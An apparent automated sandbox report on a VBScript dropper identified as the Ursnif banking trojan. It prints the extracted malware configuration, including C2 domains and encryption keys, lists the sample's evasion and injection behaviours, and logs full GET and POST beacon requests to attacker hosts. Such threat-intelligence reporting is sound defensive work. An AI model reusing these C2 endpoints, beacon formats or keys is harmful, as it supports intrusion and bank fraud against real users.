Windows Analysis Report sample.vbs

Overview

General Information

Sample Name: sample.vbs
Analysis ID: 481106
MD5: 1dd89d4f6390f3dc46486ae6ee57bbf1
SHA1: 1be7d12e55659bdd87c34eb24d7d4adf0b68a2c5
SHA256: 801e42662653db4f680b49833f5ee0a48124aa814dd4178be1f948f4a8a68b07
Tags: vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000012.00000003.755921050.0000000000AE0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 18_2_00F23276
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 18_2_05741577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 18_2_057314A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 18_2_05746E4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 18_2_05751802

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49818 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49819 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49820 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49821 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49821 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=124046255642640572323054504739User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 675Host: art.microsoftsofymicrosoftsoft.at
Source: rundll32.exe, 00000012.00000002.870125823.0000000000B1A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000012.00000003.809344105.0000000000B86000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW
Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000016.00000003.845905572.00000200ADF45000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.872464143.00000200AE0A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown HTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 18_2_00F23276

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
